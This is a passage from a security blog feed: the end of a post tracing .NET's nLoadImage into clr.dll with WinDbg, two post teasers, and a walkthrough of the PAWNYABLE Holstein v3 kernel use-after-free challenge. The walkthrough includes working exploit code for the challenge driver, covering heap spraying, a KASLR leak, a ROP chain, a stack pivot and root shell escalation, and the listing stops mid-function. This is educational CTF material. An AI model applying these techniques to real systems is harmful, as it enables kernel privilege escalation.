    As you can see, all you get is a method signature and an InternalCall property. To begin to understand how we might be able to reverse engineer this method, we need to know the definition of InternalCall. According to MSDN documentation, InternalCall refers to a method call that “is internal, that is, it calls a method that is implemented within the common language runtime.” So it would seem likely that this method is implemented as a native function in clr.dll. To validate my assumption, let’s use Windbg with sos.dll – the managed code debugger extension. My goal using Windbg will be to determine the native pointer for the nLoadImage method and see if it jumps to its respective native function in clr.dll. I will attach Windbg to PowerShell since PowerShell will make it easy to get the information needed by the SOS debugger extension. The first thing I need to do is get the metadata token for the nLoadImage method. This will be used in Windbg to resolve the method.
     
     
    As you can see, the Get-ILDisassembly function in PowerSploit conveniently provides the metadata token for the nLoadImage method. Now on to Windbg for further analysis…
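
    If you don't have PowerSploit to hand, plain reflection can also surface the token (a rough sketch; the token value differs between framework builds):

    PS C:\> $RA = [Reflection.Assembly].Assembly.GetType('System.Reflection.RuntimeAssembly')
    PS C:\> $flags = [Reflection.BindingFlags] 'NonPublic, Public, Static, Instance'
    PS C:\> $nLoadImage = $RA.GetMethods($flags) | Where-Object Name -eq 'nLoadImage' | Select-Object -First 1
    PS C:\> '0x{0:X8}' -f $nLoadImage.MetadataToken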
     
     
    The following commands were executed:
     
    1) .loadby sos clr
     
    Load the SOS debugging extension from the directory that clr.dll is loaded from
     
    2) !Token2EE mscorlib.dll 0x0600278C
     
    Retrieves the MethodDesc of the nLoadImage method. The first argument (mscorlib.dll) is the module that implements the nLoadImage method and the hex number is the metadata token retrieved from PowerShell.
     
    3) !DumpMD 0x634381b0
     
    I then dump information about the MethodDesc. This will give the address of the method table for the object that implements nLoadImage
     
    4) !DumpMT -MD 0x636e42fc
     
    This will dump all of the methods for the System.Reflection.RuntimeAssembly class with their respective native entry point. nLoadImage has the following entry:
     
    635910a0 634381b0   NONE System.Reflection.RuntimeAssembly.nLoadImage(Byte[], Byte[], System.Security.Policy.Evidence, System.Threading.StackCrawlMark ByRef, Boolean, System.Security.SecurityContextSource)
     
    So the native address for nLoadImage is 0x635910a0. Now, set a breakpoint on that address, let the program continue execution and use PowerShell to call the Load method on a bogus PE byte array.
     
    PS C:\> [Reflection.Assembly]::Load(([Byte[]]@(1,2,3)))
     
    You’ll then hit your breakpoint in Windbg and if you disassemble from where you landed, the function that implements the nLoadImage method will be crystal clear – clr!AssemblyNative::LoadImage
     
     
    You can now use IDA for further analysis and begin digging into the actual implementation of this InternalCall method!
     
     
    After digging into some of the InternalCall methods in IDA you’ll quickly see that most functions use the fastcall convention. In x86, this means that a static function will pass its first two arguments via ECX and EDX. If it’s an instance function, the ‘this’ pointer will be passed via ECX (as is standard in thiscall) and its first argument via EDX. Any remaining arguments are pushed onto the stack.
     
    So for the handful of people that have wondered where the implementation for an InternalCall method lies, I hope this post has been helpful.

    IRQLs Close Encounters of the Rootkit Kind

    3 January 2022 at 00:00
    IRQL Overview

    Present since the early stages of Windows NT, an Interrupt Request Level (IRQL) defines the current hardware priority at which a CPU runs at any given time. On a multi-processor architecture, each CPU can hold a different and independent IRQL value, which is stored inside the CR8 register. We should keep this in mind as we are going to build our lab examples on a quad-core system. Every hardware interrupt is mapped to a specific request level as depicted below.

    Bypassing Intel CET with Counterfeit Objects

    22 September 2022 at 00:00
    Since its inception in 2005, return-oriented programming (ROP) has been the predominant avenue to thwart the W^X mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and instead of injecting an entire code payload, they resorted to reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per-page basis to allow the existing code payloads to run.

    PAWNYABLE UAF Walkthrough (Holstein v3)

    By: h0mbre
    29 October 2022 at 04:00

    Introduction

    I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago @ptrYudai from @zer0pts tweeted that they released the beta version of their website PAWNYABLE!, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.

    The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.

    What I Started With

    PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and your first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).

    I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but started gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually led to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated), I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.

    The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.

    So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.

    What I Did

    To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):

    • Introduction to kernel exploits
    • kernel debugging with gdb
    • security mechanism (Overview of Exploitation Mitigations)
    • Compile and transfer exploits (working with the kernel image)

    This was great as a starting point because everything is so well organized you don’t have to spend time setting up your environment, it’s basically just copy-pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).

    Next, I started working on the first challenge, which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer and from there, you’re learning about the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges, for instance via prepare_kernel_cred and commit_creds.

    You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.

    After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from @_lkmidas:

    This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.

    As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: overwriting modprobe_path.

    After all this, I felt like I had a good enough base to get started on the UAF challenge.

    UAF Challenge: Holstein v3

    Some quick vulnerability analysis on the vulnerable driver provided by the author states the problem clearly.

    char *g_buf = NULL;
    
    static int module_open(struct inode *inode, struct file *file)
    {
      printk(KERN_INFO "module_open called\n");
    
      g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
      if (!g_buf) {
        printk(KERN_INFO "kmalloc failed");
        return -ENOMEM;
      }
    
      return 0;
    }
    

    When we open the kernel driver, char *g_buf gets assigned the result of a call to kzalloc().

    static int module_close(struct inode *inode, struct file *file)
    {
      printk(KERN_INFO "module_close called\n");
      kfree(g_buf);
      return 0;
    }
    

    When we close the kernel driver, g_buf is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.

    1. We’ve done nothing, g_buf = NULL
    2. We’ve opened the driver, g_buf = 0xffff...a0, and we have fd1 in our program
    3. We’ve opened the driver a second time, g_buf = 0xffff...b0. The original value of 0xffff...a0 has been overwritten. It can no longer be freed and would cause a memory leak (not super important). We now have fd2 in our program
    4. We close fd1 which calls kfree() on 0xffff...b0 and frees the same pointer we have a reference to with fd2.
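
    In code, that sequence is just a couple of calls (a sketch; the device path is assumed to be /dev/holstein):

    #include <fcntl.h>
    #include <unistd.h>

    int main(void)
    {
        int fd1 = open("/dev/holstein", O_RDWR); /* g_buf = kzalloc(0x400, GFP_KERNEL) */
        int fd2 = open("/dev/holstein", O_RDWR); /* g_buf is overwritten with a fresh allocation */
        close(fd1);                              /* kfree(g_buf): fd2 now operates on freed memory */

        /* ...reclaim the freed slot (e.g. with a tty_struct), then read/write via fd2... */
        return 0;
    }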

    At this point, via our access to fd2, we have a use after free since we can still potentially use a freed reference to g_buf. The module also allows us to use the open file descriptor with read and write methods.

    static ssize_t module_read(struct file *file,
                               char __user *buf, size_t count,
                               loff_t *f_pos)
    {
      printk(KERN_INFO "module_read called\n");
    
      if (count > BUFFER_SIZE) {
        printk(KERN_INFO "invalid buffer size\n");
        return -EINVAL;
      }
    
      if (copy_to_user(buf, g_buf, count)) {
        printk(KERN_INFO "copy_to_user failed\n");
        return -EINVAL;
      }
    
      return count;
    }
    
    static ssize_t module_write(struct file *file,
                                const char __user *buf, size_t count,
                                loff_t *f_pos)
    {
      printk(KERN_INFO "module_write called\n");
    
      if (count > BUFFER_SIZE) {
        printk(KERN_INFO "invalid buffer size\n");
        return -EINVAL;
      }
    
      if (copy_from_user(g_buf, buf, count)) {
        printk(KERN_INFO "copy_from_user failed\n");
        return -EINVAL;
      }
    
      return count;
    }
    

    So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to 0x400.

    At a high-level, UAFs are generally exploited by creating the UAF condition, so we have a reference to a freed object within our control, and then we want to cause the allocation of a different object to fill the space that was previously filled by our freed object.

    So if we allocated a g_buf of size 0x400 and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.

    KASLR Bypass

    The first thing we need to do is bypass KASLR by leaking some address that is at a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog of useful Linux Kernel data structures for exploitation. This led me to the tty_struct, which is allocated on the same slab cache as our 0x400 buffer, the kmalloc-1024. The tty_struct has a field called tty_operations which is a pointer to a function table that is a static offset from the kernel base. So if we can leak the address of tty_operations we will have bypassed KASLR. This struct was used by NCC Group for the same purpose in their exploit of CVE-2022-32250.

    It’s important to note that the slab cache we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.

    So with our module_read ability, we will simply:

    1. Free g_buf
    2. Create dev_tty structs until one hopefully fills the freed space where g_buf used to live
    3. Call module_read to get a copy of the g_buf which is now actually our dev_tty and then inspect the value of tty_struct->tty_operations.

    Here are some snippets of code related to that from the exploit:

    // Leak a tty_struct->ops field which is constant offset from kernel base
    uint64_t leak_ops(int fd) {
        if (fd < 0) {
            err("Bad fd given to `leak_ops()`");
        }
    
        /* tty_struct {
            int magic;      // 4 bytes
            struct kref;    // 4 bytes (single member is an int refcount_t)
            struct device *dev; // 8 bytes
            struct tty_driver *driver; // 8 bytes
            const struct tty_operations *ops; (offset 24 (or 0x18))
            ...
        } */
    
        // Read first 32 bytes of the structure
        unsigned char *ops_buf = calloc(1, 32);
        if (!ops_buf) {
            err("Failed to allocate ops_buf");
        }
    
        ssize_t bytes_read = read(fd, ops_buf, 32);
        if (bytes_read != (ssize_t)32) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        uint64_t ops = *(uint64_t *)&ops_buf[24];
        info("tty_struct->ops: 0x%lx", ops);
    
        // Solve for kernel base, keep the last 12 bits
        uint64_t test = ops & 0b111111111111;
    
        // These magic compares are for static offsets on this kernel
        if (test == 0xb40ULL) {
            return ops - 0xc39b40ULL;
        }
    
        else if (test == 0xc60ULL) {
            return ops - 0xc39c60ULL;
        }
    
        else {
            err("Got an unexpected tty_struct->ops ptr");
        }
    }
    

    There’s a confusing part about ANDing off the lower 12 bits of the leaked value, and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there are two kinds of tty_structs that can be allocated and they are allocated in pairs. This if/else if block just handles both cases and solves for the kernel base. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.

    RIP Control

    Next, we need some way to hijack execution. Luckily, we can use the same data structure, tty_struct, as we can write to the object using module_write and overwrite the pointer value for tty_struct->ops.

    struct tty_operations is a table of function pointers, and looks like this:

    struct tty_operations {
    	struct tty_struct * (*lookup)(struct tty_driver *driver,
    			struct file *filp, int idx);
    	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    	int  (*open)(struct tty_struct * tty, struct file * filp);
    	void (*close)(struct tty_struct * tty, struct file * filp);
    	void (*shutdown)(struct tty_struct *tty);
    	void (*cleanup)(struct tty_struct *tty);
    	int  (*write)(struct tty_struct * tty,
    		      const unsigned char *buf, int count);
    	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    	void (*flush_chars)(struct tty_struct *tty);
    	unsigned int (*write_room)(struct tty_struct *tty);
    	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
    	int  (*ioctl)(struct tty_struct *tty,
    		    unsigned int cmd, unsigned long arg);
    ...SNIP...
    

    These functions are invoked on the tty_struct when certain actions are performed on an instance of a tty_struct. For example, when the tty_struct’s controlling process exits, several of these functions are called in a row: close(), shutdown(), and cleanup().

    So our plan (the first three steps are sketched in code right after this list) will be to:

    1. Create UAF condition
    2. Occupy free’d memory with tty_struct
    3. Read a copy of the tty_struct back to us in userland
    4. Alter the tty->ops value to point to a faked function table that we control
    5. Write the new data back to the tty_struct which is now corrupted
    6. Do something to the tty_struct that causes a function we control to be invoked
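
    To make the first three steps concrete, here is a minimal sketch of the sequence that the full exploit’s main() (at the end of this post) performs; error handling and the spray/verify loops are omitted, and uaf_sketch() is just an illustrative name:

    #include <fcntl.h>
    #include <stdint.h>
    #include <unistd.h>

    void uaf_sketch(void) {
        // Step 1: create the UAF condition the same way main() does below:
        // open two handles to the vulnerable driver, then close one.
        int fd1 = open("/dev/holstein", O_RDWR);
        int fd2 = open("/dev/holstein", O_RDWR);
        close(fd1);                 // g_buf is freed, but fd2 still references it

        // Step 2: reclaim the freed kmalloc-1024 slot with a tty_struct
        // (the real exploit sprays up to 50 of these)
        int pty = open("/dev/ptmx", O_RDONLY | O_NOCTTY);

        // Step 3: read the object back through the dangling fd and check
        // tty->magic (0x5401) to confirm a tty_struct landed in our slot
        unsigned char buf[0x400] = { 0 };
        read(fd2, buf, sizeof(buf));
        if (*(int32_t *)buf == 0x5401) {
            // fd2 now reads and writes a live tty_struct
        }

        close(pty);
        close(fd2);
    }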

    PAWNYABLE tells us that a popular target is invoking ioctl() as the function takes several arguments which are user-controlled.

    int  (*ioctl)(struct tty_struct *tty,
    		    unsigned int cmd, unsigned long arg);
    

    From userland, we can supply the values for cmd and arg. This gives us some flexibility. The value we can provide for cmd is somewhat limited as an unsigned int is only 4 bytes. arg gives us a full 8 bytes of control over RDX. Since we can control the contents of RDX whenever we invoke ioctl(), we need to find a gadget to pivot the stack to some code in the kernel heap that we can control. I found such a gadget here:

    0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
    

    The gadget pushes the value in RDX (our arg) onto the stack and then pops that value into RSP, so from that point on the kernel stack points at memory whose contents we control, and the gadget’s final ret transfers execution into it. The control flow will go something like this (see the snippet after the list):

    1. Invoke ioctl() on our corrupted tty_struct
    2. ioctl() has been overwritten by a stack-pivot gadget that places the location of our ROP chain into RSP
    3. ioctl() returns execution to our ROP chain
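
    Concretely, this is how the pivot is eventually triggered at the end of the full exploit; tty_fd stands in here for one of the sprayed /dev/ptmx file descriptors, and rop_addr is the leaked msg_msg body address we compute later:

    // With the fake table installed, ops->ioctl is the push rdx gadget.
    // arg lands in RDX, so we pass rop_addr - 8:
    //   push rdx              ; pushes rop_addr - 8 onto the kernel stack
    //   xor eax, 0x415b004f   ; harmless, only clobbers EAX
    //   pop rsp               ; RSP = rop_addr - 8, i.e. our msg_msg body
    //   pop rbp               ; consumes the slack qword at rop_addr - 8
    //   ret                   ; jumps to the first gadget of the chain at rop_addr
    // The cmd value (0xcafebabe) appears to be arbitrary; the gadget never uses it.
    ioctl(tty_fd, 0xcafebabe, rop_addr - 8);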

    So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?

    Creating/Locating a ROP Chain and Fake Function Table

    This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the msg_msg struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:

    • Stores arbitrary data inline in the structure body (not via a pointer to the heap)
    • Contains a linked-list member that contains the addresses to prev and next messages within the same kernel message queue
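
    For reference, here is the msg_msg header layout as annotated in the full exploit’s found_msg() later in this post; the body we control starts at offset 48:

    /* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        }                           // 16 bytes: links to other msg_msg's in the queue
        long m_type;                // 8 bytes: the mtype we pass to msgsnd()
        int m_ts;                   // 4 bytes: message text size
        struct msg_msgseg *next;    // 8 bytes
        void *security;             // 8 bytes

        ===== Body (mtext contents) starts here (offset 48) =====
    } */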

    So quickly, a strategy began to form. We could:

    1. Create our ROP chain and fake function table in a buffer
    2. Send the buffer as the body of a msg_msg struct
    3. Use our module_read capability to read the msg_msg->list.next and msg_msg->list.prev values to know where in the heap at least two of our messages were stored

    With this ability, we would know exactly what address to supply as an argument to ioctl() when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:

    // Allocate one msg_msg on the heap
    size_t send_message() {
        // Calculate current queue
        if (num_queue < 1) {
            err("`send_message()` called with no message queues");
        }
        int curr_q = msg_queue[num_queue - 1];
    
        // Send message
        size_t fails = 0;
        struct msgbuf {
            long mtype;
            char mtext[MSG_SZ];
        } msg;
    
        // Unique identifier we can use
        msg.mtype = 0x1337;
    
        // Construct the ROP chain
        memset(msg.mtext, 0, MSG_SZ);
    
        // Pattern for offsets (debugging)
        uint64_t base = 0x41;
        uint64_t *curr = (uint64_t *)&msg.mtext[0];
        for (size_t i = 0; i < 25; i++) {
            uint64_t fill = base << 56;
            fill |= base << 48;
            fill |= base << 40;
            fill |= base << 32;
            fill |= base << 24;
            fill |= base << 16;
            fill |= base << 8;
            fill |= base;
            
            *curr++ = fill;
            base++; 
        }
    
        // ROP chain
        uint64_t *rop = (uint64_t *)&msg.mtext[0];
        *rop++ = pop_rdi; 
        *rop++ = 0x0;
        *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
        *rop++ = xchg_rdi_rax; // Place creds into RDI 
        *rop++ = commit_creds; // Now we have super powers
        *rop++ = kpti_tramp;
        *rop++ = 0x0; // pop rax inside kpti_tramp
        *rop++ = 0x0; // pop rdi inside kpti_tramp
        *rop++ = (uint64_t)pop_shell; // Return here
        *rop++ = user_cs;
        *rop++ = user_rflags;
        *rop++ = user_sp;
        *rop   = user_ss;
    
        /* struct tty_operations {
            struct tty_struct * (*lookup)(struct tty_driver *driver,
                    struct file *filp, int idx);
            int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
            void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
            int  (*open)(struct tty_struct * tty, struct file * filp);
            void (*close)(struct tty_struct * tty, struct file * filp);
            void (*shutdown)(struct tty_struct *tty);
            void (*cleanup)(struct tty_struct *tty);
            int  (*write)(struct tty_struct * tty,
                    const unsigned char *buf, int count);
            int  (*put_char)(struct tty_struct *tty, unsigned char ch);
            void (*flush_chars)(struct tty_struct *tty);
            unsigned int (*write_room)(struct tty_struct *tty);
            unsigned int (*chars_in_buffer)(struct tty_struct *tty);
            int  (*ioctl)(struct tty_struct *tty,
                    unsigned int cmd, unsigned long arg);
            ...
        } */
    
        // Populate the 12 function pointers in the table that we have created.
        // There are 3 handlers that are invoked for allocated tty_structs when 
        // their controlling process exits, they are close(), shutdown(),
        // and cleanup(). We have to overwrite these pointers for when we exit our
        // exploit process or else the kernel will panic with a RIP of 
        // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
        uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
        for (size_t i = 0; i < 12; i++) {
            // If i == 4, we're on the close() handler, set to ret gadget
            if (i == 4) { *func_table++ = ret; continue; }
    
            // If i == 5, we're on the shutdown() handler, set to ret gadget
            if (i == 5) { *func_table++ = ret; continue; }
    
            // If i == 6, we're on the cleanup() handler, set to ret gadget
            if (i == 6) { *func_table++ = ret; continue; }
    
            // Magic value for debugging
            *func_table++ = 0xdeadbeefdeadbe00 + i;
        }
    
        // Put our gadget address as the ioctl() handler to pivot stack
        *func_table = push_rdx;
    
        // Spray msg_msg's on the heap
        if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
            fails++;
        }
    
        return fails;
    }
    

    I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state; I wanted to exit cleanly. This presented a problem, since we are completely hijacking the ops function table which the kernel will use to clean up our tty_struct. So I found a gadget that simply performs a ret, and overwrote the function pointers for close(), shutdown(), and cleanup() with it, so that when they are invoked they simply return; the kernel is apparently fine with this and doesn’t panic.

    So our message body looks something like: <----ROP chain----><----Faked function table---->
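
    In terms of the constants used in the exploit (rop_len = 200 and ioctl_off = 12 * sizeof(uint64_t) = 96), the mtext layout works out to roughly:

    // mtext[0]   : ROP chain (13 qwords), ending with the saved userland frame
    //              consumed by the KPTI trampoline
    // mtext[200] : fake tty_operations table (fake_table = rop_addr + rop_len)
    // mtext[296] : entry 12 of that table, the ioctl() slot, set to the
    //              push rdx stack-pivot gadget (ioctl_ptr = fake_table + ioctl_off)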

    Here is the code I used to overwrite the tty_struct->ops pointer:

    void overwrite_ops(int fd) {
        unsigned char g_buf[GBUF_SZ] = { 0 };
        ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
        if (bytes_read != (ssize_t)GBUF_SZ) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        // Overwrite the tty_struct->ops pointer with ROP address
        *(uint64_t *)&g_buf[24] = fake_table;
        ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
        if (bytes_written != (ssize_t)GBUF_SZ) {
            err("Failed to write enough bytes to fd: %d", fd);
        }
    }
    

    So now that we know where our ROP chain is, where our faked function table is, and we have the perfect stack pivot gadget, the rest of the process is simply building a real ROP chain, the details of which I will leave out of this post.

    As a first-timer, this tiny bit of creativity, leveraging the read ability to leak the addresses of msg_msg structs, was enough to get me hooked. Here is a picture of the exploit in action:

    Miscellaneous

    There were some things I tried to do to increase the exploit’s reliability.

    One was to check the magic value in the leaked tty_structs to make sure a tty_struct had actually filled our freed memory and not another object. This is extremely convenient! All tty_structs have 0x5401 at tty->magic.

    Another thing I did was spray msg_msg structs with an easily recognizable message type of 0x1337. This way, when leaked, I could easily verify I was in fact leaking msg_msg contents and not some other arbitrary data structure. You could also check that supposed kernel addresses start with 0xffff.
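
    As a hedged sketch of that last suggestion (this check is not in the exploit as written, and the helper name is mine): canonical kernel addresses on x86_64 have their top 16 bits set, so the leaked m_list pointers could be screened with something like:

    #include <stdbool.h>
    #include <stdint.h>

    // Hypothetical extra heuristic for found_msg(): reject leaks whose
    // list pointers do not look like canonical kernel addresses.
    static bool looks_like_kernel_ptr(uint64_t p) {
        return (p >> 48) == 0xffffULL;
    }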

    Finally, there was the patching of the clean-up-related function pointers in tty->ops.

    Further Reading

    There are lots of challenges besides the UAF one on PAWNYABLE, please go check them out. One of the primary reasons I wrote this was to get the author’s project more visitors and beneficiaries. It has made a big difference for me and in the almost month since I finished this challenge, I have learned a ton. Special thanks to @chompie1337 for letting me complain and giving me helpful advice/resources.

    Some awesome blogposts I read throughout the learning process up to this point include:

    • https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel
    • https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
    • https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
    • https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

    Exploit Code

    // One liner to add exploit to filesystem
    // gcc exploit.c -o exploit -static && cp exploit rootfs && cd rootfs && find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs.cpio && cd ../
    
    #include <stdio.h> /* printf */
    #include <sys/types.h> /* open */
    #include <sys/stat.h> /* open */
    #include <fcntl.h> /* open */
    #include <stdlib.h> /* exit */
    #include <stdint.h> /* int_t's */
    #include <unistd.h> /* getuid */
    #include <string.h> /* memset */
    #include <sys/ipc.h> /* msg_msg */ 
    #include <sys/msg.h> /* msg_msg */
    #include <sys/ioctl.h> /* ioctl */
    #include <stdarg.h> /* va_args */
    #include <stdbool.h> /* true, false */ 
    
    #define DEV "/dev/holstein"
    #define PTMX "/dev/ptmx"
    
    #define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
    #define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
    #define NUM_QUEUE (size_t)4         // Number of msg queues
    #define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
    #define GBUF_SZ (size_t)0x400       // Size of g_buf in driver
    
    // User state globals
    uint64_t user_cs;
    uint64_t user_ss;
    uint64_t user_rflags;
    uint64_t user_sp;
    
    // Mutable globals, when in Rome
    uint64_t base;
    uint64_t rop_addr;
    uint64_t fake_table;
    uint64_t ioctl_ptr;
    int open_ptmx[PTMX_SPRAY] = { 0 };          // Store fds for clean up/ioctl()
    int num_ptmx = 0;                           // Number of open fds
    int msg_queue[NUM_QUEUE] = { 0 };           // Initialized message queues
    int num_queue = 0;
    
    // Misc constants. 
    const uint64_t rop_len = 200;
    const uint64_t ioctl_off = 12 * sizeof(uint64_t);
    
    // Gadgets
    // 0x723c0: commit_creds
    uint64_t commit_creds;
    // 0x72560: prepare_kernel_cred
    uint64_t prepare_kernel_cred;
    // 0x800e10: swapgs_restore_regs_and_return_to_usermode
    uint64_t kpti_tramp;
    // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)
    uint64_t push_rdx;
    // 0x35738d: pop rdi; ret;
    uint64_t pop_rdi;
    // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
    uint64_t xchg_rdi_rax;
    // 0x32afea: ret;
    uint64_t ret;
    
    void err(const char* format, ...) {
        if (!format) {
            exit(-1);
        }
    
        fprintf(stderr, "%s", "[!] ");
        va_list args;
        va_start(args, format);
        vfprintf(stderr, format, args);
        va_end(args);
        fprintf(stderr, "%s", "\n");
        exit(-1);
    }
    
    void info(const char* format, ...) {
        if (!format) {
            return;
        }
        
        fprintf(stderr, "%s", "[*] ");
        va_list args;
        va_start(args, format);
        vfprintf(stderr, format, args);
        va_end(args);
        fprintf(stderr, "%s", "\n");
    }
    
    void save_state(void) {
        __asm__(
            ".intel_syntax noprefix;"   
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            // Push CPU flags onto stack
            "pushf;"
            // Pop CPU flags into var
            "pop user_rflags;"
            ".att_syntax;"
        );
    }
    
    // Should spawn a root shell
    void pop_shell(void) {
        uid_t uid = getuid();
        if (uid != 0) {
            err("We are not root, wtf?");
        }
    
        info("We got root, spawning shell!");
        system("/bin/sh");
        exit(0);
    }
    
    // Open a char device, just exit on error, this is exploit code
    int open_device(char *dev, int flags) {
        int fd = -1;
        if (!dev) {
            err("NULL ptr given to `open_device()`");
        }
    
        fd = open(dev, flags);
        if (fd < 0) {
            err("Failed to open '%s'", dev);
        }
    
        return fd;
    }
    
    // Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap
    void alloc_ptmx() {
        int fd = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
        if (fd < 0) {
            err("Failed to open /dev/ptmx");
        }
    
        open_ptmx[num_ptmx] = fd;
        num_ptmx++;
    }
    
    // Check to see if we have a reference to a tty_struct by reading in the magic
    // number for the current allocation in our slab
    bool found_ptmx(int fd) {
        unsigned char magic_buf[4];
        if (fd < 0) {
            err("Bad fd given to `found_ptmx()`\n");
        }
    
        ssize_t bytes_read = read(fd, magic_buf, 4);
        if (bytes_read != (ssize_t)4) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        if (*(int32_t *)magic_buf != 0x5401) {
            return false;
        }
    
        return true;
    }
    
    // Leak a tty_struct->ops field which is constant offset from kernel base
    uint64_t leak_ops(int fd) {
        if (fd < 0) {
            err("Bad fd given to `leak_ops()`");
        }
    
        /* tty_struct {
            int magic;      // 4 bytes
            struct kref;    // 4 bytes (single member is an int refcount_t)
            struct device *dev; // 8 bytes
            struct tty_driver *driver; // 8 bytes
            const struct tty_operations *ops; (offset 24 (or 0x18))
            ...
        } */
    
        // Read first 32 bytes of the structure
        unsigned char *ops_buf = calloc(1, 32);
        if (!ops_buf) {
            err("Failed to allocate ops_buf");
        }
    
        ssize_t bytes_read = read(fd, ops_buf, 32);
        if (bytes_read != (ssize_t)32) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        uint64_t ops = *(uint64_t *)&ops_buf[24];
        info("tty_struct->ops: 0x%lx", ops);
    
        // Solve for kernel base, keep the last 12 bits
        uint64_t test = ops & 0b111111111111;
    
        // These magic compares are for static offsets on this kernel
        if (test == 0xb40ULL) {
            return ops - 0xc39b40ULL;
        }
    
        else if (test == 0xc60ULL) {
            return ops - 0xc39c60ULL;
        }
    
        else {
